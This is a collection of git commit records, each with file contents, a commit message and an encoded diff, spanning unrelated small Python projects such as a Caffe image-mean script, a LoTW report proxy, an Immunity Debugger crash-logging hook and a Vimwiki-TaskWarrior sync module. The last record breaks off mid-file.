    def track(self, event):
        """Send a single tracking event"""
        log.debug('Sending track event: %s', event)
        return self.session.post(self.url + '/track', json=event, auth=self.auth)

    @classmethod
    def new_instance(cls, session=None):
        """Initialize an instance using values from the configuration"""
        if not session:
            session = sessions.FuturesSession()
        return cls(
            session,
            settings.ANALYTICS_ENDPOINT,
            utils.deobfuscate(settings.ANALYTICS_TOKEN)
        )
Python
0.000009
@@ -348,16 +348,98 @@
 elled')
+        elif future.exception():
            log.warning(future.exception_info())
8088d7061c24ca78df0c92be6e36edb7deca1dac
Remove print
gargoyle/client/operators/__init__.py
gargoyle/client/operators/__init__.py
import inspect


class GetInitArguments(object):
    def __get__(self, obj, obj_type):
        print obj_type
        args = inspect.getargspec(obj_type.__init__).args
        return tuple(args[1:])


class Base(object):
    def __init__(self):
        pass

    arguments = GetInitArguments()
Python
0.000016
@@ -89,35 +89,8 @@
 e):
-        print obj_type
8238d7ad6793f6deef520a46f85d40b0d75d221f
Add placeholder for the parsing code
gpmf/parse.py
gpmf/parse.py
Python
0.000002
@@ -0,0 +1,112 @@
+# TODO: Implement GPMF parsing
# see https://github.com/gopro/gpmf-parser#gmfp-deeper-dive for format details
d7553fd42e3ac0bcdf0ab70468ad314253b64871
Create parse.py
zoom/parse.py
zoom/parse.py
Python
0
@@ -0,0 +1,1433 @@
+parse(geo, df) :
    latDict, lonDict = dict(), dict()

    # identify extreme most latitude and longitude coordinate pairs in each state
    # save coordinate pair of most extreme points for autozoom
    for count in range(0,len(usStates['features'])) :
        if geo['key'] in [code for code in statePctChange['code']] :
            for coords in geo['key']['coordinates'][0] :
                # collect lat, lon data in either geoJSON format
                # lat, lon data will either be in list (coords) or a list of lists (pairs) 
                try :
                    latDict[coords[1]] = coords
                    lonDict[coords[0]] = coords
                except :
                    for pair in coords :
                        latDict[pair[1]] = pair
                        lonDict[pair[0]] = pair
    
    bounds = [list(reversed(l)) for l in [latDict[max([key for key in latDict.keys()])], latDict[min([key for key in latDict.keys()])],
            lonDict[max([key for key in lonDict.keys()])], lonDict[min([key for key in lonDict.keys()])]]]
    # keep most extreme bounds to save maximum bounding triangle
    triangle = bounds.remove(min([abs(max([key for key in latDict.keys()])), abs(min([key for key in latDict.keys()])), 
            abs(max([key for key in lonDict.keys()])), abs(min([key for key in lonDict.keys()]))]))

    return bounds, triangle
0f7d6f039930324d77dc23315ed3c9bd10c1f0de
Add missing file
util.py
util.py
Python
0.000006
@@ -0,0 +1,1530 @@
+#
# Copyright 2016 Anil Thomas
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Utility functions.
"""
import numpy as np
from sklearn import metrics
from prep import nwin


def avg(labels, preds):
    assert preds.shape[0] % nwin == 0
    preds_len = preds.shape[0] // nwin
    post_preds = np.zeros(preds_len, np.float32)
    post_labels = np.zeros(preds_len, np.float32)
    for i in range(preds_len):
        post_preds[i] = np.mean(preds[nwin*i:nwin*(i+1)])
        post_labels[i] = labels[nwin*i]
        assert post_labels[i] == np.mean(labels[nwin*i:nwin*(i+1)])
    return (post_labels, post_preds)


def avg_preds(preds):
    assert preds.shape[0] % nwin == 0
    preds_len = preds.shape[0] // nwin
    post_preds = np.zeros(preds_len, np.float32)
    for i in range(preds_len):
        post_preds[i] = np.mean(preds[nwin*i:nwin*(i+1)])
    return post_preds


def auc(labels, preds):
    return metrics.roc_auc_score(labels, preds)


def score(labels, preds):
    return auc(*avg(labels, preds))
37dabf1c98407602edda25dbb9c24c17bd84f19a
Add timer to builders
dev/scripts/coolprop_builder_timer.py
dev/scripts/coolprop_builder_timer.py
Python
0
@@ -0,0 +1,502 @@
+from __future__ import print_function

import urllib, json
filehandle = urllib.urlopen('http://www.coolprop.dreamhosters.com:8010/json/builders')
jj = json.loads(filehandle.read())

times = []
for key in jj.keys():
    filehandle = urllib.urlopen('http://www.coolprop.dreamhosters.com:8010/json/builders/' + key + '/builds/-1')
    builder = json.loads(filehandle.read())
    elapsed_time = builder['times'][1] - builder['times'][0]
    times.append((elapsed_time, key))
    
print(sorted(times)[::-1])
b37eae02a69759352652514635616b9bb504b21b
rewritten as a function
ex33-1.py
ex33-1.py
Python
0.999441
@@ -0,0 +1,727 @@
+def append_wrapper(n):
	'''Append the natural numbers up to n to a list and print the last element at the beginning and
	end of each iteration. Then print the list
	n -- the upper bound
	'''
	i=0
	numbers = []

	while i<n:
		#where we are at the beginning of the iteration
		print "At the top i is %d" % i

		numbers.append(i)

		#if we don't increment the loop will go on forever or until the OS stops it.
		i = i + 1
		print "Numbers now: ", numbers
		#now look!
		print "At the bottom i is %d" % i

		print "The numbers: "

		for num in numbers:
			print num

input_num = input("Count up to WHAT?!")
if isinstance(input_num, int):
	append_wrapper(input_num)
else:
	print "Counting numbers only. This program will exit now."
45aacb9d0f5f24600d4796cc5194dfbde1c65222
Add map/dist/filter demo
learning-python/ch05/MapExamples.py
learning-python/ch05/MapExamples.py
Python
0
@@ -0,0 +1,919 @@
+lst = range(10)

ret = map(lambda *i: i, lst, "abcdefg")

for item in ret:
    print(item)

students = [
    dict(id=0, credits=dict(math=9, physics=6, history=7)),
    dict(id=1, credits=dict(math=6, physics=7, latin=10)),
    dict(id=2, credits=dict(history=8, physics=9, chemistry=10)),
    dict(id=3, credits=dict(math=5, physics=5, geography=7)),
]

print(type(students[0]["credits"].values()))

def decorate(student):
    return (sum(student['credits'].values()), student)

def undecorate(decorated_student):
    return decorated_student[1]

students = sorted(map(decorate, students), reverse=True)

for s in students:
    print(s)

students = list(map(undecorate, students))

for s in students:
    print(s)


a = [3, 6, 9]
b = [4, 7, 10]
c = [1, 8, 2]

r = map(lambda n: max(*n), zip(a, b, c))
for item in r:
    print(item)

d = [0, 1, 2, 3, 4]
ret = filter(lambda n: n > 2, d)
for item in ret:
    print(item)
efcc5260a8566d41880cddcc54d4f86c8f722153
Add unit test
test/unit_test/test_utility_stats/test_utility_stats.py
test/unit_test/test_utility_stats/test_utility_stats.py
Python
0.000001
@@ -0,0 +1,436 @@
+from lexos.processors.analyze import information

word_lists = [{"abundant": 40, "actually": 20, "advanced": 15, "alter": 5},
              {"hunger": 1, "hunt": 2, "ignore": 3, "illustration": 4,
               "ink": 5}]

file_list = ["file_one.txt", "file_two.txt"]

for i in range(len(file_list)):
    # because the first row of the first line is the ''
    file_information = information.FileInformation(word_lists[i], file_list)
7dc489b393ba293db5cc72c2f9b2bd65d6fe1166
add command to migrate sheet.
upload/management/commands/import_transaction.py
upload/management/commands/import_transaction.py
Python
0
@@ -0,0 +1,928 @@
+import csv
from django.contrib.auth.models import User
from opencivicdata.models import Jurisdiction, Division
from upload.backend.parser import import_stream, people_to_pupa
from upload.backend.importer import do_import
from upload.models import SpreadsheetUpload

from django.core.management.base import BaseCommand, CommandError


class Command(BaseCommand):
    args = '<transaction> <user>'
    help = 'Import a Sheet'

    def import_transaction(self, transaction_id, username):
        user = User.objects.get(username=username)
        transaction = SpreadsheetUpload.objects.get(id=transaction_id)

        assert transaction.approved_by is None

        stream = people_to_pupa(transaction.people.all(), transaction)
        report = do_import(stream, transaction)
        transaction.approved_by = user
        transaction.save()

    def handle(self, *args, **options):
        return self.import_transaction(*args)
35a0832ab372b9519ed7391e166ef8c25456a005
Bump minor version
pygerduty/version.py
pygerduty/version.py
version_info = (0, 28, 1)
__version__ = '.'.join(str(v) for v in version_info)
Python
0
@@ -20,9 +20,9 @@
 28, 
-1
+2
 )
__
b9245a8acf0bed7e19f709490c4ba3788028da93
Fix error in PoolStatusEntry model
server/ec2spotmanager/migrations/0003_auto_20150504_1440.py
server/ec2spotmanager/migrations/0003_auto_20150504_1440.py
Python
0.000001
@@ -0,0 +1,612 @@
+# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
        ('ec2spotmanager', '0002_instancestatusentry_poolstatusentry'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='poolstatusentry',
            name='instance',
        ),
        migrations.AddField(
            model_name='poolstatusentry',
            name='pool',
            field=models.ForeignKey(default=0, to='ec2spotmanager.InstancePool'),
            preserve_default=False,
        ),
    ]
d05bdc1a3a343184a02ec12b734a110140e94829
add persistent decorator of class
server/Mars/ServerUtils/PersistentDecorator.py
server/Mars/ServerUtils/PersistentDecorator.py
Python
0.000001
@@ -0,0 +1,1460 @@
+#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2016 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#  * Redistributions of source code must retain the above copyright
#    notice, this list ofconditions and the following disclaimer.
#
#  * Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in
#    the documentation and/or other materialsprovided with the
#    distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

def persistent(cls):
    cls.isPersistent = True
    return cls
ee21691294e6bf9aacf0dd8591991c33d30c5159
raise KeyboardInterrupt for backward compatibility
pysnmp/carrier/asyncore/dispatch.py
pysnmp/carrier/asyncore/dispatch.py
# Implements I/O over asynchronous sockets
from time import time
from sys import exc_info
from asyncore import socket_map
from asyncore import loop
from pysnmp.carrier.base import AbstractTransportDispatcher
from pysnmp.error import PySnmpError

class AsynsockDispatcher(AbstractTransportDispatcher):
    def __init__(self):
        self.__sockMap = {} # use own map for MT safety
        self.timeout = 0.5
        AbstractTransportDispatcher.__init__(self)

    def getSocketMap(self): return self.__sockMap
    def setSocketMap(self, sockMap=socket_map): self.__sockMap = sockMap

    def registerTransport(self, tDomain, t):
        AbstractTransportDispatcher.registerTransport(self, tDomain, t)
        t.registerSocket(self.__sockMap)

    def unregisterTransport(self, tDomain):
        self.getTransport(tDomain).unregisterSocket(self.__sockMap)
        AbstractTransportDispatcher.unregisterTransport(self, tDomain)

    def transportsAreWorking(self):
        for transport in self.__sockMap.values():
            if transport.writable():
                return 1
        return 0

    def runDispatcher(self, timeout=0.0):
        while self.jobsArePending() or self.transportsAreWorking():
            try:
                loop(timeout and timeout or self.timeout,
                     use_poll=True, map=self.__sockMap, count=1)
            except:
                raise PySnmpError('poll error: %s' % exc_info()[1])
            self.handleTimerTick(time())
Python
0.000001
@@ -1344,16 +1344,76 @@
 ount=1)
+            except KeyboardInterrupt:
                raise
98bd10cdf2c380b17c16a47a8f962dc384b3a18d
Solve py set discard remove pop
python/py-set-discard-remove-pop.py
python/py-set-discard-remove-pop.py
Python
0.999979
@@ -0,0 +1,288 @@
+num_elements = int(input())
s = set(map(int, input().split()))
num_operations = int(input())
for _ in range(num_operations):
    operation = input().split(" ")
    if(operation[0] == "pop"):
        s.pop()
    else:
        op, val = operation
        s.discard(int(val))

print(sum(s))
a8db812c5a9822f6ea72bf44134ed2219a2c5c74
Remove print statement.
app/main/views/dashboard.py
app/main/views/dashboard.py
from flask import (abort, render_template, session)
from flask_login import login_required

from app.main import main
from app.main.dao.services_dao import get_service_by_id
from app.main.dao import templates_dao
from notifications_python_client.errors import HTTPError
from app import job_api_client
from app.utils import user_has_permissions


@main.route("/services/<service_id>/dashboard")
@login_required
def service_dashboard(service_id):
    try:
        templates = templates_dao.get_service_templates(service_id)['data']
        jobs = job_api_client.get_job(service_id)['data']
    except HTTPError as e:
        if e.status_code == 404:
            abort(404)
        else:
            raise e

    try:
        service = get_service_by_id(service_id)
        session['service_name'] = service['data']['name']
        print(service['data']['id'])
        session['service_id'] = service['data']['id']
    except HTTPError as e:
        if e.status_code == 404:
            abort(404)
        else:
            raise e

    return render_template(
        'views/service_dashboard.html',
        jobs=list(reversed(jobs))[:5],
        more_jobs_to_show=(len(jobs) > 5),
        free_text_messages_remaining='250,000',
        spent_this_month='0.00',
        template_count=len(templates),
        service_id=str(service_id))
Python
0.000046
@@ -817,45 +817,8 @@
 e']
-        print(service['data']['id'])
f3130bde2704008017e1438bf7d6cb1c0bbf3d61
Create jsonSender.py
jsonSender.py
jsonSender.py
Python
0.000048
@@ -0,0 +1,706 @@
+import socket
import json
import time
from distancemeter import get_distance,cleanup

# Logstash TCP/JSON Host
JSON_PORT = 5959
JSON_HOST = '127.0.0.1'

if __name__ == '__main__':
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((JSON_HOST, JSON_PORT))

        while True:
            distance = get_distance()
            data = {'message': 'distance %.1f cm' % distance, 'distance': distance, 'hostname': socket.gethostname()}

            s.send(json.dumps(data))
            s.send('\n')
            print ("Received distance = %.1f cm" % distance)
            time.sleep(0.2)

    # interrupt
    except KeyboardInterrupt:
        print("Program interrupted")
482c79850a943f77034d376c0d8e8682142b705d
Add init
project_management/pmtools/__init__.py
project_management/pmtools/__init__.py
Python
0.085164
@@ -0,0 +1,736 @@
+"""
Pipeline Management Tools

Usage: pm command [options]
"""

from cement.core import foundation, controller, handler

## Abstract base controller -- for sharing arguments
class AbstractBaseController(controller.CementBaseController):
    class Meta:
        arguments = [
            (['-n', '--dry_run'], dict(help="dry_run - don't actually do anything")),
        ]

    def _setup(self, base_app):
        super(AbstractBaseController, self)._setup(base_app)
        self.shared_config = dict()


## Main pm base controller
class PmController(controller.CementBaseController):
    class Meta:
        label = 'pm'
        description = ''

    @controller.expose(hide=True)
    def default(self):
        print dir(self)
d853fba90a8fc784cdb248923cede6166fe91a8f
remove some field that duplicate
netforce_mfg/netforce_mfg/models/stock_barcode.py
netforce_mfg/netforce_mfg/models/stock_barcode.py
# Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.

from netforce.model import Model, fields, get_model


class Barcode(Model):
    _inhierit= "stock.barcode"
    _transient = True
    _fields = {
        "type": fields.Selection([["in", "Goods Receipt"], ["internal", "Goods Transfer"], ["out", "Goods Issue"]], "Transaction Type"),
        "related_id": fields.Reference([["sale.order", "Sales Order"], ["purchase.order", "Purchase Order"], ["production.order", "Production Order"], ["stock.picking", "Picking"]], "Related To"),
    }

    def onchange_related(self, context={}):
        data = context["data"]
        type = data["type"]
        val = data["related_id"][0]
        relation, rel_id = val.split(",")
        rel_id = int(rel_id)
        if relation == "production.order":
            rel = get_model("production.order").browse(rel_id)
            if type == "out":
                data["location_to_id"] = rel.production_location_id.id
            elif type == "in":
                data["location_from_id"] = rel.production_location_id.id
        return data

Barcode.register()
Python
0.000004
@@ -1206,182 +1206,24 @@
 de"
-    _transient = True
    _fields = {
        "type": fields.Selection([["in", "Goods Receipt"], ["internal", "Goods Transfer"], ["out", "Goods Issue"]], "Transaction Type"),
+
    _fields = { 
 
f1e2ae06784d759b0f6dbfae1424a2de70353ea9
add a module used to call platon (software assigning space groups) on a structure in pymatgen
pymatgen/command_line/platon_caller.py
pymatgen/command_line/platon_caller.py
Python
0
@@ -0,0 +1,1589 @@
+'''
Interface with command line platon
http://aflowlib.org/
Only tested on Linux
inspired by Shyue's qhull_caller
WARNING: you need to have a platon in your path for this to work
'''

__author__="Geoffroy Hautier"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Geoffroy Hautier"
__email__ = "geoffroy.hautier@uclouvain.be"
__status__ = "Production"
__date__ ="$February 24, 2012M$"

import subprocess
import pymatgen.io.cifio
import os


def run_platon_command(command, structure):
    """
    Helper function for calling platon with different arguments
    I know it's uggly to actually write a file and call platon but I did not manage to make it work in another way
    """
    writer=pymatgen.io.cifio.CifWriter(structure)
    #incommand=str(writer)
    #print incommand
    writer.write_file("/tmp/tmp.cif")
    command.append("/tmp/tmp.cif")
    p = subprocess.Popen(command,shell = False, stdout = subprocess.PIPE, stdin = subprocess.PIPE)
    output = p.communicate()
    os.remove("/tmp/tmp.cif")
    return output

def get_space_group(structure):
    output=run_platon_command(['platon', '-o', '-c'], structure)
    dictio={}
    for line in output[0].split("\n"):
       # print line
        if(line.find("Space Group")!=-1):
            list_tmp=line.split()
           # print list_tmp
            for i in range(len(list_tmp)):
                if(list_tmp[i]=='Group'):
                    dictio['SG_HM']=list_tmp[i+1]
                if(list_tmp[i]=='No:'):
                    dictio['SG_NB']=list_tmp[i+1]
    return dictio
6cad2d60857e9d8714f679f68ae4887e58092a57
Add caffe-compute-image-mean.
python2.7/caffe-compute-image-mean.py
python2.7/caffe-compute-image-mean.py
Python
0.000002
@@ -0,0 +1,1795 @@
+#!/usr/bin/env python2

import sys
sys.path.append("/home/bamos/repos/caffe-local/python")

import argparse
import numpy as np
import os
import time

from caffe.proto import caffe_pb2
from caffe.io import array_to_blobproto
from collections import defaultdict
from skimage import io

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('meanPrefix', type=str, help="TODO")
    parser.add_argument('imageDir', type=str, help="TODO")
    args = parser.parse_args()

    exts = ["jpg", "png"]

    mean = np.zeros((1, 3, 152, 152))
    N = 0
    classSizes = defaultdict(int)

    beginTime = time.time()
    for subdir, dirs, files in os.walk(args.imageDir):
        for fName in files:
            (imageClass, imageName) = (os.path.basename(subdir), fName)
            if any(imageName.lower().endswith("." + ext) for ext in exts):
                img = io.imread(os.path.join(subdir, fName))
                if img.shape == (152, 152, 3):
                    mean[0][0] += img[:,:,0]
                    mean[0][1] += img[:,:,1]
                    mean[0][2] += img[:,:,2]
                    N += 1
                    if N % 1000 == 0:
                        elapsed = time.time() - beginTime
                        print("Processed {} images in {:.2f} seconds. "
                              "{:.2f} images/second.".format(N, elapsed,
                                                             N/elapsed))
    mean[0] /= N

    blob = array_to_blobproto(mean)
    with open("{}.binaryproto".format(args.meanPrefix), 'wb') as f:
        f.write(blob.SerializeToString())
    np.save("{}.npy".format(args.meanPrefix), mean[0])

    meanImg = np.transpose(mean[0].astype(np.uint8), (1, 2, 0))
    io.imsave("{}.png".format(args.meanPrefix), meanImg)
8e94da2cf788115a1562db253c96b1932b495ef3
Add script for generating chords, used to make some of the sounds.
make_chord.py
make_chord.py
Python
0
@@ -0,0 +1,986 @@ +from collections import OrderedDict%0Afrom itertools import cycle%0Aimport sys%0A%0A# build the pitch table%0Anote_names = %5B'A', 'A#/Bb', 'B', 'C', 'C#/Db', 'D', 'D#/Eb', 'E', 'F', 'F#/Gb', 'G', 'G#/Ab'%5D%0Anote_cycle = cycle(note_names)%0A%0Apiano = %5B%5D%0Aonumber = 0%0Afor i in range(1, 89):%0A note = note_cycle.next()%0A%0A if note == 'C':%0A onumber += 1%0A%0A piano.append(%7B%0A 'number': i,%0A 'name': %5Bn + str(onumber) for n in note.split('/')%5D,%0A 'freq': (2 ** ((i - 49.0) / 12)) * 440%0A %7D)%0A%0A# invert it%0Afreqs = %7B%7D%0Afor key in piano:%0A for name in key%5B'name'%5D:%0A freqs%5Bname%5D = key%5B'freq'%5D%0A%0A# look at arguments for pitch names and build samples%0Afrom wavebender import *%0A%0Aflist = %5B%5D%0Arequested = sys.argv%5B1:%5D%0Aamp = 0.8 / len(requested)%0Afor arg in requested:%0A flist.append(sine_wave(freqs%5Barg%5D, amplitude=amp))%0A%0Achannels = (tuple(flist),)%0A%0Anframes = 44100 * 10%0A%0Asamples = compute_samples(channels, nframes)%0Awrite_wavefile(sys.stdout, samples, nchannels=1, nframes=nframes)
56bfc977ea1e7b415e699a82459c917c71fe36df
add app.utils module
app/utils.py
app/utils.py
Python
0.000002
@@ -0,0 +1,113 @@ +%0A%0Adef get_city_by_coordinates(lon, lat):%0A # TODO: determinate city (reverse geocoding...)%0A return %22MyCity%22%0A
2b1500419e97b75c7b5bda9d8e226ed8340edb50
add experimental python proxy
lotwreport.py
lotwreport.py
Python
0.000001
@@ -0,0 +1,3223 @@ +#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A%22%22%22%0Alotwreport.py: proxy for ARRL LoTW lotwreport.adi web service, which does not%0Asupport CORS headers and thus cannot be called from a script that is loaded%0Afrom any other server. This CGI must be served from the same host name as%0Aany script that wishes to call it. Because I do not want other peoples'%0Ascripts to call this service, it deliberately does nnot support CORS, either.%0A%22%22%22%0A#%0A# LICENSE:%0A#%0A# Copyright (c) 2018, Jeffrey B. Otterson, N1KDO%0A# All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions are met:%0A#%0A# 1. Redistributions of source code must retain the above copyright notice, this%0A# list of conditions and the following disclaimer.%0A# 2. Redistributions in binary form must reproduce the above copyright notice,%0A# this list of conditions and the following disclaimer in the documentation%0A# and/or other materials provided with the distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS %22AS IS%22 AND%0A# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED%0A# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE%0A# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR%0A# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES%0A# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND%0A# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT%0A# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS%0A# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.%0A%0Aimport cgi, os, urllib2, sys%0A%0Avalid_args = %5B'login', 'password', 'qso_query', 'qso_qsl',%0A 'qso_qslsince', 'qso_qsorxsince', 'qso_owncall', 'qso_callsign',%0A 'qso_mode', 'qso_band', 'qso_dxcc',%0A 'qso_startdate', 'qso_starttime',%0A 'qso_enddate', 'qso_endtime',%0A 'qso_mydetail', 'qso_qsldetail', 'qso_withown'%5D%0A%0Aform = cgi.FieldStorage()%0Acallsign = form%5B'login'%5D.value if 'login' in form else None%0Apassword = form%5B'password'%5D.value if 'password' in form else None%0Aclient = os.environ%5B%22REMOTE_ADDR%22%5D%0A%0Apfx = '?'%0Aurl = 'https://lotw.arrl.org/lotwuser/lotwreport.adi'%0Afor arg in valid_args:%0A if arg in form:%0A url = url + pfx + arg + '=' + form%5Barg%5D.value%0A pfx = '&'%0A%0Aif callsign == 'n1kdo' and password is None and client.startswith('192.168.1'):%0A print 'Content-Type: application/x-arrl-adif'%0A print%0A try:%0A filename = callsign + '.adi'%0A with open(filename, 'r') as file:%0A data = file.read()%0A print data%0A except IOError:%0A print 'no cache'%0Aelse:%0A req = urllib2.Request(url)%0A response = urllib2.urlopen(req, None, 600)%0A data = response.read()%0A if callsign == 'n1kdo' and 'ARRL Logbook of the World Status Report' in data:%0A filename = callsign + '.adi'%0A with open(filename, 'w') as file:%0A file.write(data)%0A info = response.info()%0A print 'Content-Type: %25s' %25 info%5B'Content-Type'%5D%0A print%0A print data%0A
e43ffdc6ce35438b188f84ec34855ac3ff5a4722
Create immhook.py
immhook.py
immhook.py
Python
0.000001
@@ -0,0 +1,1040 @@ +#-------------------------------------------------------------------------------%0A# Name: Immunity debugger Exception Hook%0A# Purpose: The script throws out values of EIP,ESP when a crash exception occours%0A#%0A# Author: darklord%0A#%0A# Created: 19/10/2014%0A# Copyright: (c) darklord 2014%0A# Licence: %3Cyour licence%3E%0A#-------------------------------------------------------------------------------%0A%0Aimport immlib%0Afrom immlib import AllExceptHook%0A%0Aclass DemoHook(AllExceptHook):%0A%0A def __init__(self):%0A AllExceptHook.__init__(self)%0A%0A def run(self, regs):%0A imm = immlib.Debugger()%0A #picks up registers from the memory%0A eip = regs%5B'EIP'%5D%0A esp = regs%5B'ESP'%5D%0A #logging register information%0A imm.log(%22EIP: 0x%2508X ESP:0x%2508X%22%25(eip, esp))%0A #reads the data from the ESP%0A buff = imm.readString(esp)%0A%0A%0Adef main(args):%0A imm = immlib.Debugger()%0A newHook = DemoHook()%0A newHook.add('Demo Hook')%0A return 'Hook PyCommand'%0A%0Aif __name__ == '__main__':%0A main()%0A
9fa0ae7c14bfa0d352bedd5ab7ea92be7736a485
Create classes.py
classes.py
classes.py
Python
0.000001
@@ -0,0 +1,593 @@ +#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A%0Aimport notelib%0A%0Aclass Student(object):%0A%0A PassedTests = %5B%5D%0A score = 0%0A%0A def __init__(self,name):%0A self.name=name%0A%0A def take_test(self,subject,level):%0A mo = (subject,level)%0A tfiles = %5B%22%7B%7Dquestions.txt%7B%7D%22.format(mo%5B0%5D,mo%5B1%5D),%0A %22%7B%7Danswers.txt%7B%7D%22.format(mo%5B0%5D,mo%5B1%5D),%0A %22%7B%7Dhints.txt%7B%7D%22.format(mo%5B0%5D,mo%5B1%5D),%0A %22%7B%7Dfollowups.txt%7B%7D%22.format(mo%5B0%5D,mo%5B1%5D)%5D%0A counter = 0%0A question = 0%0A qs = open(tfiles%5Bcounter%5D,'r').split()%0A ans = raw_input(qs%5B0%5D)%0A
837e4d87e7f01ea50e9b25e5a8a70149ad521361
Save task only if it differs from TW representation
autoload/vimwiki_pytasks.py
autoload/vimwiki_pytasks.py
import vim import re from tasklib.task import TaskWarrior, Task # Unnamed building blocks UUID_UNNAMED = r'[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}' SPACE_UNNAMED = r'\s*' NONEMPTY_SPACE_UNNAMED = r'\s+' FINAL_SEGMENT_SEPARATOR_UNNAMED = r'(\s+|$)' # Building blocks BRACKET_OPENING = re.escape('* [') BRACKET_CLOSING = re.escape('] ') EMPTY_SPACE = r'(?P<space>\s*)' UUID = r'(?P<uuid>{0})'.format(UUID_UNNAMED) TEXT = r'(?P<text>.+(?<!{0}))'.format(UUID_UNNAMED) DUE = r'(?P<due>\(\d{4}-\d\d-\d\d( \d\d:\d\d)?\))' COMPLETION_MARK = r'(?P<completed>.)' UUID_COMMENT = '#{0}'.format(UUID) # Middle building blocks INCOMPLETE_TASK_PREFIX = EMPTY_SPACE + BRACKET_OPENING + '[^X]' + BRACKET_CLOSING + TEXT # Final regexps TASKS_TO_SAVE_TO_TW = ''.join([ INCOMPLETE_TASK_PREFIX, # any amount of whitespace followed by uncompleted square FINAL_SEGMENT_SEPARATOR_UNNAMED, '(', DUE, FINAL_SEGMENT_SEPARATOR_UNNAMED, ')?' # Due is optional '(', UUID_COMMENT, FINAL_SEGMENT_SEPARATOR_UNNAMED, ')?' # UUID is not there for new tasks ]) GENERIC_TASK = re.compile(''.join([ EMPTY_SPACE, BRACKET_OPENING, COMPLETION_MARK, BRACKET_CLOSING, TEXT, FINAL_SEGMENT_SEPARATOR_UNNAMED, '(', DUE, FINAL_SEGMENT_SEPARATOR_UNNAMED, ')?' # Due is optional '(', UUID_COMMENT, FINAL_SEGMENT_SEPARATOR_UNNAMED, ')?' # UUID is not there for new tasks ])) """ How this plugin works: 1.) On startup, it reads all the tasks and syncs info TW -> Vimwiki file. Task is identified by their uuid. 2.) When saving, the opposite sync is performed (Vimwiki -> TW direction). a) if task is marked as subtask by indentation, the dependency is created between """ tw = TaskWarrior() class TaskCache(object): def __init__(self): self.cache = dict() def __getitem__(self, key): task = self.cache.get(key) if task is None: task = VimwikiTask(vim.current.buffer[key], key) self.cache[key] = task return task def __iter__(self): while self.cache.keys(): for key in list(self.cache.keys()): task = 